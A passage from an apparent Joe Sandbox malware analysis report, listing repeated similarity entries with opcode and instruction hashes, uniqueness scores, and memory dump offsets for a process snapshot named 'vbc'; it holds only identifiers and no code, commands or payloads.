                                                                                                                                                                                            • Instruction Fuzzy Hash: 64E0DF33A5491457DB30A749D885FAA6749DFA33E4F94947AE4088F310CE55884A83A2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 85d8ebe9319586827059d42d0869c6122e4afd15486318aaaf454d5651210592
                                                                                                                                                                                            • Instruction ID: ef4a8d9c2a542849f09f533faf4f9a41668c4293b7b9d78a6f4f7040be1e5094
                                                                                                                                                                                            • Opcode Fuzzy Hash: 85d8ebe9319586827059d42d0869c6122e4afd15486318aaaf454d5651210592
                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F0A03090A1899FCB15EFF4A5555EC7BB5EF43205B1445DAD044D7362C7321F09DB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a840a1a039c8346cd60d8c3a1ed5f72a176f0d65dd38c4f042f893cbdf8faff8
                                                                                                                                                                                            • Instruction ID: 2f80b887ce254f9d06389d9c57eb9ecadc8f208ce69a4fba8d4485eedfe8ca42
                                                                                                                                                                                            • Opcode Fuzzy Hash: a840a1a039c8346cd60d8c3a1ed5f72a176f0d65dd38c4f042f893cbdf8faff8
                                                                                                                                                                                            • Instruction Fuzzy Hash: A3F03070501B058FD724DF26E50C966BBF6FF88301740852EE44BC2A56DB70A945CF94
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: bda373c434cae03371f1b394779346546508bdc04e216b03c136e2e4b9a0417c
                                                                                                                                                                                            • Instruction ID: 8e738f2fd0a85e967357d1f43db600c3ddccddd506ff826393e0a2fd42416c77
                                                                                                                                                                                            • Opcode Fuzzy Hash: bda373c434cae03371f1b394779346546508bdc04e216b03c136e2e4b9a0417c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E09235B00218EFCB11DFE9D581B9EBBEDEB48220F0084ADE50AC7741EB71AC408B90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f625d728f38ec3a56e9bb4770ef5ff3a8c970f0b8c004a9bcf0a3fa080ec8ce8
                                                                                                                                                                                            • Instruction ID: 71ed886921c2c1cfbd7d50e875e797a58489a6506c4e2cbd289f9b08ef6a8b2b
                                                                                                                                                                                            • Opcode Fuzzy Hash: f625d728f38ec3a56e9bb4770ef5ff3a8c970f0b8c004a9bcf0a3fa080ec8ce8
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2E092B990820CEFDB10EFB8E55A6ED7BA8EB41215F0048EAD40897745DB315A918BE0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f91b16e96f1b3b224e9590135abe5129dca7b3c08c41ee8c910a15a0b21006b5
                                                                                                                                                                                            • Instruction ID: 8d06777724bca48b2a8b95f7c0c4c0ef25633b44e85c20b5bf01aea71b5c69cf
                                                                                                                                                                                            • Opcode Fuzzy Hash: f91b16e96f1b3b224e9590135abe5129dca7b3c08c41ee8c910a15a0b21006b5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DE0DF31309208AB8B042B7AB94CD5ABA5FD7C9225B40487EF50AC33028E651C0183B5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 987eb286821b935ef18f104b2c9091ed6e7bdf2e4956dc8f8adf80b6b65d793f
                                                                                                                                                                                            • Instruction ID: 0797a4d82afa01b86808eba473e688b2f9d24e5d385d0f37748f7322488c8764
                                                                                                                                                                                            • Opcode Fuzzy Hash: 987eb286821b935ef18f104b2c9091ed6e7bdf2e4956dc8f8adf80b6b65d793f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF03930914388DFCB11DFA8D0692ACBFF4EF0A301F1481EAD884D3266DB314A55EB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 985907096984f1622d323285d239f09209d3fdee452cfcf79b8fd2852cd0077b
                                                                                                                                                                                            • Instruction ID: 5493795ce3bfd9b6f5364b3aceb20482d4105df3fdc3c682dbe9a444ed08ffb4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 985907096984f1622d323285d239f09209d3fdee452cfcf79b8fd2852cd0077b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AE065302057588FC714972DE54CA9E7BE6DB81219F00087DD147C7B53CB656C4987D5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e856069179e6a4c57dd322bcb990d0fff3a6e6182c7f5727bc8ee4bbcae9785a
                                                                                                                                                                                            • Instruction ID: 926c4fd605a61f80ab72af684340f34503f00d625b59be54a2f73dae15507daf
                                                                                                                                                                                            • Opcode Fuzzy Hash: e856069179e6a4c57dd322bcb990d0fff3a6e6182c7f5727bc8ee4bbcae9785a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EF039349143889FCB45DFB8941929CBFF0EF0A221F1441EBD844D7262D6315A55CF51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%